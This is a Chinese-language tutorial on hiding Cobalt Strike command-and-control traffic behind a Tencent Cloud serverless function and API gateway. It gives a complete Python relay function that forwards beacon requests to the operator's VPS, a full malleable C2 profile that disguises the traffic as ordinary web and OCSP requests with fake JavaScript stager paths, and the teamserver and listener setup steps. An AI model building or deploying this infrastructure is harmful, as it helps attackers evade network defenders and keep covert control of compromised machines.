C2隐藏

参考：https://mp.weixin.qq.com/s/sEzUenuP6lKQVcrDK_sxAw

创建云函数

https://console.cloud.tencent.com/scf/list?rid=1&ns=default
新建，选自定义，事件函数，代码部署，python3.6
代码

# coding: utf8
import json,requests,base64
def main_handler(event, context):
   response = {}
   path = None
   headers = None
   try:
       C2='你的vpsIP'
       if 'path' in event.keys():
           path=event['path']
       if 'headers' in event.keys():
           headers=event['headers']
       if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
           resp=requests.get(C2+path,headers=headers,verify=False) 
       else:      
           params=event['queryString']
           resp=requests.post(C2+path,data=event['body'],headers=headers,params=params,verify=False)
           print(resp.headers)
           print(resp.content)
       response={
           "isBase64Encoded": True,
           "statusCode": resp.status_code,
           "headers": dict(resp.headers),
           "body": str(base64.b64encode(resp.content))[2:-1]
      }
   except Exception as e:
       print('error')
       print(e)
   finally:
       return response

配置触发器

进入函数，触发管理，创建触发器，触发方式选择API网关触发

配置API网关

配置完触发器后，点进去，编辑

改一下路径就行了，保存，发布。

再次点进去，旁边的公网域名就是等下CS创建监听器要用的域名

C2profile

set sample_name "t";
set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/octet-stream";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

保存，然后带着这个文件启动teamserver，
./teamserver IP password xxx.profile

创建监听器

如图

创建的时候有几点要注意

1. HTTP Hosts填写的时候，掐头去尾，把http:// 和后面的 :80删掉，
2. 由于腾讯云只给了80和443的所以创建的监听器端口也只能是80或443，一一对应